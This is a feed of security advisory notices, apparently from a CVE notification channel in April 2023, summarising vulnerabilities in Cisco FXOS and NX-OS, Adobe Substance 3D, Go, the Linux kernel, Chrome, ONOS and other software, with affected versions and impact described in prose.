🚨 CVE-2020-3169A vulnerability in the CLI of Cisco FXOS Software could allow an authenticated, local attacker to execute arbitrary commands on the underlying Linux operating system with a privilege level of root on an affected device. The vulnerability is due to insufficient validation of arguments passed to a specific CLI command on the affected device. An attacker could exploit this vulnerability by including malicious input as the argument of an affected command. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux operating system with root privileges. An attacker would need valid administrator credentials to exploit this vulnerability.🎖@cveNotify |
|
| 2023-04-20 17:58:35 |
🚨 CVE-2020-3545A vulnerability in Cisco FXOS Software could allow an authenticated, local attacker with administrative credentials to cause a buffer overflow condition. The vulnerability is due to incorrect bounds checking of values that are parsed from a specific file. An attacker could exploit this vulnerability by supplying a crafted file that, when it is processed, may cause a stack-based buffer overflow. A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system with root privileges. An attacker would need to have valid administrative credentials to exploit this vulnerability.🎖@cveNotify |
|
| 2023-04-20 17:58:34 |
🚨 CVE-2020-3517A vulnerability in the Cisco Fabric Services component of Cisco FXOS Software and Cisco NX-OS Software could allow an unauthenticated attacker to cause process crashes, which could result in a denial of service (DoS) condition on an affected device. The attack vector is configuration dependent and could be remote or adjacent. For more information about the attack vector, see the Details section of this advisory. The vulnerability is due to insufficient error handling when the affected software parses Cisco Fabric Services messages. An attacker could exploit this vulnerability by sending malicious Cisco Fabric Services messages to an affected device. A successful exploit could allow the attacker to cause a reload of an affected device, which could result in a DoS condition.🎖@cveNotify |
|
| 2023-04-20 17:58:33 |
🚨 CVE-2019-12700A vulnerability in the configuration of the Pluggable Authentication Module (PAM) used in Cisco Firepower Threat Defense (FTD) Software, Cisco Firepower Management Center (FMC) Software, and Cisco FXOS Software could allow an authenticated, remote attacker to cause a denial of service (DoS) condition. The vulnerability is due to improper resource management in the context of user session management. An attacker could exploit this vulnerability by connecting to an affected system and performing many simultaneous successful Secure Shell (SSH) logins. A successful exploit could allow the attacker to exhaust system resources and cause the device to reload, resulting in a DoS condition. To exploit this vulnerability, the attacker needs valid user credentials on the system.🎖@cveNotify |
|
| 2023-04-20 17:58:31 |
🚨 CVE-2019-1600A vulnerability in the file system permissions of Cisco FXOS Software and Cisco NX-OS Software could allow an authenticated, local attacker to access sensitive information that is stored in the file system of an affected system. The vulnerability is due to improper implementation of file system permissions. An attacker could exploit this vulnerability by accessing and modifying restricted files. A successful exploit could allow the attacker to access sensitive and critical files. Firepower 4100 Series Next-Generation Firewalls are affected in versions prior to 2.2.2.91 and 2.3.1.110. Firepower 9300 Series Next-Generation Firewalls are affected in versions prior to 2.2.2.91 and 2.3.1.110. MDS 9000 Series Multilayer Switches are affected in versions prior to 6.2(25), 8.1(1b), and 8.3(1). Nexus 3000 Series Switches are affected in versions prior to 7.0(3)I4(9) and 7.0(3)I7(4). Nexus 3500 Platform Switches are affected in versions prior to 6.0(2)A8(10) and 7.0(3)I7(4). Nexus 3600 Platform Switches are affected in versions prior to 7.0(3)F3(5). Nexus 2000, 5500, 5600, and 6000 Series Switches are affected in versions prior to 7.1(5)N1(1b) and 7.3(3)N1(1). Nexus 7000 and 7700 Series Switches are affected in versions prior to 6.2(22), 7.3(3)D1(1), and 8.2(3). Nexus 9000 Series Switches-Standalone are affected in versions prior to 7.0(3)I4(9) and 7.0(3)I7(4). Nexus 9500 R-Series Line Cards and Fabric Modules are affected in versions prior to 7.0(3)F3(5).🎖@cveNotify |
|
| 2023-04-20 17:58:30 |
🚨 CVE-2019-1598Multiple vulnerabilities in the implementation of the Lightweight Directory Access Protocol (LDAP) feature in Cisco FXOS Software and Cisco NX-OS Software could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a denial of service (DoS) condition. The vulnerabilities are due to the improper parsing of LDAP packets by an affected device. An attacker could exploit these vulnerabilities by sending an LDAP packet crafted using Basic Encoding Rules (BER) to an affected device. The LDAP packet must have a source IP address of an LDAP server configured on the targeted device. A successful exploit could cause the affected device to reload, resulting in a DoS condition. Firepower 4100 Series Next-Generation Firewalls are affected in versions prior to 2.0.1.201, 2.2.2.54, and 2.3.1.75. Firepower 9300 Security Appliances are affected in versions prior to 2.0.1.201, 2.2.2.54, and 2.3.1.75. MDS 9000 Series Multilayer Switches are affected in versions prior to 8.2(1). Nexus 3000 Series Switches are affected in versions prior to 7.0(3)I7(1). Nexus 3500 Platform Switches are affected in versions prior to 7.0(3)I7(2). Nexus 7000 and 7700 Series Switches are affected in versions prior to 6.2(20), 7.3(2)D1(1), and 8.2(1). Nexus 9000 Series Switches in Standalone NX-OS Mode are affected in versions prior to 7.0(3)I7(1). UCS 6200 and 6300 Fabric Interconnect are affected in versions prior to 3.2(2b).🎖@cveNotify |
|
| 2023-04-20 17:58:29 |
🚨 CVE-2019-12699Multiple vulnerabilities in the CLI of Cisco FXOS Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker to execute commands on the underlying operating system (OS) with root privileges. These vulnerabilities are due to insufficient input validation. An attacker could exploit these vulnerabilities by including crafted arguments to specific CLI commands. A successful exploit could allow the attacker to execute commands on the underlying OS with root privileges.🎖@cveNotify |
|
| 2023-04-20 17:58:28 |
🚨 CVE-2017-12277A vulnerability in the Smart Licensing Manager service of the Cisco Firepower 4100 Series Next-Generation Firewall (NGFW) and Firepower 9300 Security Appliance could allow an authenticated, remote attacker to inject arbitrary commands that could be executed with root privileges. The vulnerability is due to insufficient input validation of certain Smart Licensing configuration parameters. An authenticated attacker could exploit the vulnerability by configuring a malicious URL within the affected feature. A successful exploit could allow the attacker to execute arbitrary commands with root privileges. This vulnerability affects the following Cisco Firepower Security products running FX-OS code trains 1.1.3, 1.1.4, and 2.0.1 (versions 2.1.1, 2.2.1, and 2.2.2 are not affected): Firepower 4100 Series Next-Generation Firewall and Firepower 9300 Security Appliance. Cisco Bug IDs: CSCvb86863.🎖@cveNotify |
|
| 2023-04-20 17:58:27 |
🚨 CVE-2018-0311A vulnerability in the Cisco Fabric Services component of Cisco FXOS Software and Cisco NX-OS Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability exists because the affected software insufficiently validates Cisco Fabric Services packets when the software processes packet data. An attacker could exploit this vulnerability by sending a maliciously crafted Cisco Fabric Services packet to an affected device. A successful exploit could allow the attacker to cause a buffer overflow condition on the device, which could cause process crashes and result in a DoS condition on the device. This vulnerability affects Firepower 4100 Series Next-Generation Firewalls, Firepower 9300 Security Appliance, MDS 9000 Series Multilayer Switches, Nexus 2000 Series Fabric Extenders, Nexus 3000 Series Switches, Nexus 3500 Platform Switches, Nexus 5500 Platform Switches, Nexus 5600 Platform Switches, Nexus 6000 Series Switches, Nexus 7000 Series Switches, Nexus 7700 Series Switches, Nexus 9000 Series Switches in standalone NX-OS mode, Nexus 9500 R-Series Line Cards and Fabric Modules, UCS 6100 Series Fabric Interconnects, UCS 6200 Series Fabric Interconnects, UCS 6300 Series Fabric Interconnects. Cisco Bug IDs: CSCvd69960, CSCve02463, CSCve04859, CSCve41530, CSCve41537, CSCve41541, CSCve41557.🎖@cveNotify |
|
| 2023-04-20 17:58:26 |
🚨 CVE-2018-0302A vulnerability in the CLI parser of Cisco FXOS Software and Cisco UCS Fabric Interconnect Software could allow an authenticated, local attacker to cause a buffer overflow on an affected device. The vulnerability is due to incorrect input validation in the CLI parser subsystem. An attacker could exploit this vulnerability by exceeding the expected length of user input. A successful exploit could allow the attacker to execute arbitrary code with root privileges on the affected system. This vulnerability affects Firepower 4100 Series Next-Generation Firewall, Firepower 9300 Security Appliance, UCS 6100 Series Fabric Interconnects, UCS 6200 Series Fabric Interconnects, UCS 6300 Series Fabric Interconnects. Cisco Bug IDs: CSCvb61099, CSCvb86743.🎖@cveNotify |
|
| 2023-04-20 17:58:25 |
🚨 CVE-2018-0331A vulnerability in the Cisco Discovery Protocol (formerly known as CDP) subsystem of devices running, or based on, Cisco NX-OS Software contain a vulnerability that could allow an unauthenticated, adjacent attacker to create a denial of service (DoS) condition. The vulnerability is due to a failure to properly validate certain fields within a Cisco Discovery Protocol message prior to processing it. An attacker with the ability to submit a Cisco Discovery Protocol message designed to trigger the issue could cause a DoS condition on an affected device while the device restarts. This vulnerability affects Firepower 4100 Series Next-Generation Firewall, Firepower 9300 Security Appliance, MDS 9000 Series Multilayer Director Switches, Nexus 1000V Series Switches, Nexus 1100 Series Cloud Services Platforms, Nexus 2000 Series Switches, Nexus 3000 Series Switches, Nexus 3500 Platform Switches, Nexus 3600 Platform Switches, Nexus 5500 Platform Switches, Nexus 5600 Platform Switches, Nexus 6000 Series Switches, Nexus 7000 Series Switches, Nexus 7700 Series Switches, Nexus 9000 Series Switches in NX-OS mode, Nexus 9500 R-Series Line Cards and Fabric Modules, UCS 6100 Series Fabric Interconnects, UCS 6200 Series Fabric Interconnects, UCS 6300 Series Fabric Interconnects. Cisco Bug IDs: CSCvc89242, CSCve40943, CSCve40953, CSCve40965, CSCve40970, CSCve40978, CSCve40992, CSCve41000, CSCve41007.🎖@cveNotify |
|
| 2023-04-20 17:58:24 |
🚨 CVE-2018-0298A vulnerability in the web UI of Cisco FXOS and Cisco UCS Fabric Interconnect Software could allow an unauthenticated, remote attacker to cause a buffer overflow on an affected system. The vulnerability is due to incorrect input validation in the web UI. An attacker could exploit this vulnerability by sending a malicious HTTP or HTTPS packet directed to the physical management interface of an affected system. A successful exploit could allow the attacker to cause the process to crash and possibly reload the device, resulting in a denial of service (DoS) condition on the affected system. This vulnerability affects Firepower 4100 Series Next-Generation Firewall, Firepower 9300 Security Appliance, UCS 6200 Series Fabric Interconnects, UCS 6300 Series Fabric Interconnects. Cisco Bug IDs: CSCvb61398, CSCvb86799.🎖@cveNotify |
|
| 2023-04-20 17:58:23 |
🚨 CVE-2018-0294A vulnerability in the write-erase feature of Cisco FXOS Software and Cisco NX-OS Software could allow an authenticated, local attacker to configure an unauthorized administrator account for an affected device. The vulnerability exists because the affected software does not properly delete sensitive files when certain CLI commands are used to clear the device configuration and reload a device. An attacker could exploit this vulnerability by logging into an affected device as an administrative user and configuring an unauthorized account for the device. The account would not require a password for authentication and would be accessible only via a Secure Shell (SSH) connection to the device. A successful exploit could allow the attacker to configure an unauthorized account that has administrative privileges, does not require a password for authentication, and does not appear in the running configuration or the audit logs for the affected device. This vulnerability affects Firepower 4100 Series Next-Generation Firewalls, Firepower 9300 Security Appliance, Nexus 1000V Series Switches, Nexus 1100 Series Cloud Services Platforms, Nexus 2000 Series Fabric Extenders, Nexus 3500 Platform Switches, Nexus 4000 Series Switches, Nexus 5500 Platform Switches, Nexus 5600 Platform Switches, Nexus 6000 Series Switches, UCS 6100 Series Fabric Interconnects, UCS 6200 Series Fabric Interconnects, UCS 6300 Series Fabric Interconnects. Cisco Bug IDs: CSCvd13993, CSCvd34845, CSCvd34857, CSCvd34862, CSCvd34879, CSCve35753.🎖@cveNotify |
|
| 2023-04-20 17:58:22 |
🚨 CVE-2018-0310A vulnerability in the Cisco Fabric Services component of Cisco FXOS Software and Cisco NX-OS Software could allow an unauthenticated, remote attacker to obtain sensitive information from memory or cause a denial of service (DoS) condition on the affected product. The vulnerability exists because the affected software insufficiently validates header values in Cisco Fabric Services packets. An attacker could exploit this vulnerability by sending a crafted Cisco Fabric Services packet to an affected device. A successful exploit could allow the attacker to cause a buffer overread condition, which could allow the attacker to obtain sensitive information from memory or cause a DoS condition on the affected product. This vulnerability affects Firepower 4100 Series Next-Generation Firewalls, Firepower 9300 Security Appliance, MDS 9000 Series Multilayer Switches, Nexus 2000 Series Fabric Extenders, Nexus 3000 Series Switches, Nexus 3500 Platform Switches, Nexus 5500 Platform Switches, Nexus 5600 Platform Switches, Nexus 6000 Series Switches, Nexus 7000 Series Switches, Nexus 7700 Series Switches, Nexus 9000 Series Switches in standalone NX-OS mode, Nexus 9500 R-Series Line Cards and Fabric Modules, UCS 6100 Series Fabric Interconnects, UCS 6200 Series Fabric Interconnects, UCS 6300 Series Fabric Interconnects. Cisco Bug IDs: CSCvd69957, CSCve02435, CSCve04859, CSCve41536, CSCve41538, CSCve41559.🎖@cveNotify |
|
| 2023-04-20 17:58:21 |
🚨 CVE-2018-0303A vulnerability in the Cisco Discovery Protocol component of Cisco FXOS Software and Cisco NX-OS Software could allow an unauthenticated, adjacent attacker to execute arbitrary code as root or cause a denial of service (DoS) condition on the affected device. The vulnerability exists because of insufficiently validated Cisco Discovery Protocol packet headers. An attacker could exploit this vulnerability by sending a crafted Cisco Discovery Protocol packet to a Layer 2 adjacent affected device. A successful exploit could allow the attacker to cause a buffer overflow that could allow the attacker to execute arbitrary code as root or cause a DoS condition on the affected device. This vulnerability affects the following if configured to use Cisco Discovery Protocol: Firepower 4100 Series Next-Generation Firewalls, Firepower 9300 Security Appliance, MDS 9000 Series Multilayer Switches, Nexus 1000V Series Switches, Nexus 1100 Series Cloud Services Platforms, Nexus 2000 Series Fabric Extenders, Nexus 3000 Series Switches, Nexus 3500 Platform Switches, Nexus 5500 Platform Switches, Nexus 5600 Platform Switches, Nexus 6000 Series Switches, Nexus 7000 Series Switches, Nexus 7700 Series Switches, Nexus 9000 Series Fabric Switches in Application Centric Infrastructure (ACI) mode, Nexus 9000 Series Switches in standalone NX-OS mode, Nexus 9500 R-Series Line Cards and Fabric Modules, UCS 6100 Series Fabric Interconnects, UCS 6200 Series Fabric Interconnects, UCS 6300 Series Fabric Interconnects. Cisco Bug IDs: CSCvc22202, CSCvc22205, CSCvc22208, CSCvc88078, CSCvc88150, CSCvc88159, CSCvc88162, CSCvc88167.🎖@cveNotify |
|
| 2023-04-20 17:58:20 |
🚨 CVE-2023-21980Vulnerability in the MySQL Server product of Oracle MySQL (component: Client programs). Supported versions that are affected are 5.7.41 and prior and 8.0.32 and prior. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of MySQL Server. CVSS 3.1 Base Score 7.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H).🎖@cveNotify |
|
| 2023-04-20 14:58:33 |
🚨 CVE-2023-26409Adobe Substance 3D Designer version 12.4.0 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-20 14:58:32 |
🚨 CVE-2023-26398Adobe Substance 3D Designer version 12.4.0 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-20 14:58:31 |
🚨 CVE-2023-26412Adobe Substance 3D Designer version 12.4.0 (and earlier) is affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-20 14:58:30 |
🚨 CVE-2023-26411Adobe Substance 3D Designer version 12.4.0 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-20 14:58:26 |
🚨 CVE-2023-21925Vulnerability in the Oracle Health Sciences InForm product of Oracle Health Sciences Applications (component: Core). Supported versions that are affected are Prior to 6.3.1.3 and Prior to 7.0.0.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Health Sciences InForm. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Health Sciences InForm. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).🎖@cveNotify |
|
| 2023-04-20 14:58:25 |
🚨 CVE-2023-21923Vulnerability in the Oracle Health Sciences InForm product of Oracle Health Sciences Applications (component: Core). Supported versions that are affected are Prior to 6.3.1.3 and Prior to 7.0.0.1. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Health Sciences InForm. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Health Sciences InForm accessible data as well as unauthorized access to critical data or complete access to all Oracle Health Sciences InForm accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Health Sciences InForm. CVSS 3.1 Base Score 8.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L).🎖@cveNotify |
|
| 2023-04-20 14:58:24 |
🚨 CVE-2021-38363An issue was discovered in ONOS 2.5.1. In IntentManager, the install-requested intent (which causes an exception) remains in pendingMap (in memory) forever. Deletion is possible neither by a user nor by the intermittent Intent Cleanup process.🎖@cveNotify |
|
| 2023-04-20 14:58:20 |
🚨 CVE-2021-38364An issue was discovered in ONOS 2.5.1. There is an incorrect comparison of flow rules installed by intents. A remote attacker can install or remove a new intent, and consequently modify or delete the existing flow rules related to other intents.🎖@cveNotify |
|
| 2023-04-20 14:58:19 |
🚨 CVE-2022-24035An issue was discovered in ONOS 2.5.1. The purge-requested intent remains on the list, but it does not respond to changes in topology (e.g., link failure). In combination with other applications, it could lead to a failure of network management.🎖@cveNotify |
|
| 2023-04-20 14:58:18 |
🚨 CVE-2022-29604An issue was discovered in ONOS 2.5.1. An intent with an uppercase letter in a device ID shows the CORRUPT state, which is misleading to a network operator. Improper handling of case sensitivity causes inconsistency between intent and flow rules in the network.🎖@cveNotify |
|
| 2023-04-20 14:58:17 |
🚨 CVE-2022-29605An issue was discovered in ONOS 2.5.1. IntentManager attempts to install the IPv6 flow rules of an intent into an OpenFlow 1.0 switch that does not support IPv6. Improper handling of the difference in capabilities of the intent and switch is misleading to a network operator.🎖@cveNotify |
|
| 2023-04-20 14:58:14 |
🚨 CVE-2022-29606An issue was discovered in ONOS 2.5.1. An intent with a large port number shows the CORRUPT state, which is misleading to a network operator. Improper handling of such port numbers causes inconsistency between intent and flow rules in the network.🎖@cveNotify |
|
| 2023-04-20 14:58:13 |
🚨 CVE-2022-29608An issue was discovered in ONOS 2.5.1. An intent with a port that is an intermediate point of its path installs an invalid flow rule, causing a network loop.🎖@cveNotify |
|
| 2023-04-20 14:58:12 |
🚨 CVE-2022-29944An issue was discovered in ONOS 2.5.1. There is an incorrect comparison of paths installed by intents. An existing intents does not redirect to a new path, even if a new intent that shares the path with higher priority is installed.🎖@cveNotify |
|
| 2023-04-20 12:58:31 |
🚨 CVE-2023-1767The Snyk Advisor website (https://snyk.io/advisor/) was vulnerable to a stored XSS prior to 28th March 2023. A feature of Snyk Advisor is to display the contents of a scanned package's Readme on its package health page. An attacker could create a package in NPM with an associated markdown README file containing XSS-able HTML tags. Upon Snyk Advisor importing the package, the XSS would run each time an end user browsed to the package's page on Snyk Advisor.🎖@cveNotify |
|
| 2023-04-20 10:58:42 |
🚨 CVE-2022-2097AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the plaintext would be revealed. Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected. Fixed in OpenSSL 3.0.5 (Affected 3.0.0-3.0.4). Fixed in OpenSSL 1.1.1q (Affected 1.1.1-1.1.1p).🎖@cveNotify |
|
| 2023-04-20 10:58:38 |
🚨 CVE-2021-24510The MF Gig Calendar WordPress plugin before 1.2 does not sanitise and escape the id GET parameter before outputting back in the admin dashboard when editing an Event, leading to a reflected Cross-Site Scripting issue🎖@cveNotify |
|
| 2023-04-20 10:58:37 |
🚨 CVE-2023-26464** UNSUPPORTED WHEN ASSIGNED **When using the Chainsaw or SocketAppender components with Log4j 1.x on JRE less than 1.7, an attacker that manages to cause a logging entry involving a specially-crafted (ie, deeply nested) hashmap or hashtable (depending on which logging component is in use) to be processed could exhaust the available memory in the virtual machine and achieve Denial of Service when the object is deserialized.This issue affects Apache Log4j before 2. Affected users are recommended to update to Log4j 2.x.NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-04-20 10:58:36 |
🚨 CVE-2023-28047Dell Display Manager, versions 2.1.0 and prior, contains an arbitrary file or folder creation vulnerability during installation. A local low privilege attacker could potentially exploit this vulnerability, leading to the execution of arbitrary code on the operating system with high privileges.🎖@cveNotify |
|
| 2023-04-20 10:58:35 |
🚨 CVE-2023-2133Out of bounds memory access in Service Worker API in Google Chrome prior to 112.0.5615.137 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-20 10:58:32 |
🚨 CVE-2023-2134Out of bounds memory access in Service Worker API in Google Chrome prior to 112.0.5615.137 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-20 10:58:31 |
🚨 CVE-2023-2136Integer overflow in Skia in Google Chrome prior to 112.0.5615.137 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-20 10:58:30 |
🚨 CVE-2021-43612In lldpd before 1.0.13, when decoding SONMP packets in the sonmp_decode function, it's possible to trigger an out-of-bounds heap read via short SONMP packets.🎖@cveNotify |
|
| 2023-04-20 05:58:28 |
🚨 CVE-2023-2191Cross-site Scripting (XSS) - Stored in GitHub repository azuracast/azuracast prior to 0.18.🎖@cveNotify |
|
| 2023-04-20 05:58:27 |
🚨 CVE-2022-24921regexp.Compile in Go before 1.16.15 and 1.17.x before 1.17.8 allows stack exhaustion via a deeply nested expression.🎖@cveNotify |
|
| 2023-04-20 05:58:25 |
🚨 CVE-2022-23806Curve.IsOnCurve in crypto/elliptic in Go before 1.16.14 and 1.17.x before 1.17.7 can incorrectly return true in situations with a big.Int value that is not a valid field element.🎖@cveNotify |
|
| 2023-04-20 05:58:24 |
🚨 CVE-2021-39293In archive/zip in Go before 1.16.8 and 1.17.x before 1.17.1, a crafted archive header (falsely designating that many files are present) can cause a NewReader or OpenReader panic. NOTE: this issue exists because of an incomplete fix for CVE-2021-33196.🎖@cveNotify |
|
| 2023-04-20 05:58:23 |
🚨 CVE-2021-44717Go before 1.16.12 and 1.17.x before 1.17.5 on UNIX allows write operations to an unintended file or unintended network connection as a consequence of erroneous closing of file descriptor 0 after file-descriptor exhaustion.🎖@cveNotify |
|
| 2023-04-20 05:58:22 |
🚨 CVE-2021-44716net/http in Go before 1.16.12 and 1.17.x before 1.17.5 allows uncontrolled memory consumption in the header canonicalization cache via HTTP/2 requests.🎖@cveNotify |
|
| 2023-04-20 05:58:20 |
🚨 CVE-2021-41771ImportedSymbols in debug/macho (for Open or OpenFat) in Go before 1.16.10 and 1.17.x before 1.17.3 Accesses a Memory Location After the End of a Buffer, aka an out-of-bounds slice situation.🎖@cveNotify |
|
| 2023-04-20 05:58:19 |
🚨 CVE-2021-38297Go before 1.16.9 and 1.17.x before 1.17.2 has a Buffer Overflow via large arguments in a function invocation from a WASM module, when GOARCH=wasm GOOS=js is used.🎖@cveNotify |
|
| 2023-04-20 05:58:18 |
🚨 CVE-2021-36221Go before 1.15.15 and 1.16.x before 1.16.7 has a race condition that can lead to a net/http/httputil ReverseProxy panic upon an ErrAbortHandler abort.🎖@cveNotify |
|
| 2023-04-20 05:58:16 |
🚨 CVE-2021-33196In archive/zip in Go before 1.15.13 and 1.16.x before 1.16.5, a crafted file count (in an archive's header) can cause a NewReader or OpenReader panic.🎖@cveNotify |
|
| 2023-04-20 05:58:15 |
🚨 CVE-2020-28367Code injection in the go command with cgo before Go 1.14.12 and Go 1.15.5 allows arbitrary code execution at build time via malicious gcc flags specified via a #cgo directive.🎖@cveNotify |
|
| 2023-04-20 01:58:22 |
🚨 CVE-2023-1382A data race flaw was found in the Linux kernel, between where con is allocated and con->sock is set. This issue leads to a NULL pointer dereference when accessing con->sock->sk in net/tipc/topsrv.c in the tipc protocol in the Linux kernel.🎖@cveNotify |
|
| 2023-04-20 01:58:21 |
🚨 CVE-2023-23451The Flexi Classic and Flexi Soft Gateways SICK UE410-EN3 FLEXI ETHERNET GATEW., SICK UE410-EN1 FLEXI ETHERNET GATEW., SICK UE410-EN3S04 FLEXI ETHERNET GATEW., SICK UE410-EN4 FLEXI ETHERNET GATEW., SICK FX0-GENT00000 FLEXISOFT EIP GATEW., SICK FX0-GMOD00000 FLEXISOFT MOD GATEW., SICK FX0-GPNT00000 FLEXISOFT PNET GATEW., SICK FX0-GENT00030 FLEXISOFT EIP GATEW.V2, SICK FX0-GPNT00030 FLEXISOFT PNET GATEW.V2 and SICK FX0-GMOD00010 FLEXISOFT MOD GW. have Telnet enabled by factory default. No password is set in the default configuration. Gateways with a serial number >2311xxxx have the Telnet interface disabled by factory default.🎖@cveNotify |
|
| 2023-04-20 01:58:20 |
🚨 CVE-2023-28327A NULL pointer dereference flaw was found in the UNIX protocol in net/unix/diag.c In unix_diag_get_exact in the Linux Kernel. The newly allocated skb does not have sk, leading to a NULL pointer. This flaw allows a local user to crash or potentially cause a denial of service.🎖@cveNotify |
|
| 2023-04-20 01:58:19 |
🚨 CVE-2023-28328A NULL pointer dereference flaw was found in the az6027 driver in drivers/media/usb/dev-usb/az6027.c in the Linux Kernel. The message from user space is not checked properly before transferring into the device. This flaw allows a local user to crash the system or potentially cause a denial of service.🎖@cveNotify |
|
| 2023-04-20 01:58:15 |
🚨 CVE-2023-2166A null pointer dereference issue was found in can protocol in net/can/af_can.c in the Linux before Linux. ml_priv may not be initialized in the receive path of CAN frames. A local user could use this flaw to crash the system or potentially cause a denial of service.🎖@cveNotify |
|
| 2023-04-20 01:58:14 |
🚨 CVE-2021-33970Buffer Overflow vulnerability in Qihoo 360 Chrome v13.0.2170.0 allows attacker to escalate priveleges.🎖@cveNotify |
|
| 2023-04-20 01:58:13 |
🚨 CVE-2021-3429When instructing cloud-init to set a random password for a new user account, versions before 21.2 would write that password to the world-readable log file /var/log/cloud-init-output.log. This could allow a local user to log in as another user.🎖@cveNotify |
|
| 2023-04-20 01:58:12 |
🚨 CVE-2022-2084Sensitive data could be exposed in world readable logs of cloud-init before version 22.3 when schema failures are reported. This leak could include hashed passwords.🎖@cveNotify |
|
| 2023-04-19 22:58:42 |
🚨 CVE-2023-26389Adobe Substance 3D Stager version 2.0.1 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-19 22:58:41 |
🚨 CVE-2023-26388Adobe Substance 3D Stager version 2.0.1 (and earlier) is affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-19 22:58:40 |
🚨 CVE-2023-26390Adobe Substance 3D Stager version 2.0.1 (and earlier) is affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-19 22:58:39 |
🚨 CVE-2023-26391Adobe Substance 3D Stager version 2.0.1 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-19 22:58:38 |
🚨 CVE-2023-26392Adobe Substance 3D Stager version 2.0.1 (and earlier) is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-19 22:58:34 |
🚨 CVE-2023-26393Adobe Substance 3D Stager version 2.0.1 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-19 22:58:33 |
🚨 CVE-2023-26403Adobe Substance 3D Stager version 2.0.1 (and earlier) is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-19 22:58:32 |
🚨 CVE-2023-26394Adobe Substance 3D Stager version 2.0.1 (and earlier) is affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-19 22:58:31 |
🚨 CVE-2023-26402Adobe Substance 3D Stager version 2.0.1 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-19 22:58:30 |
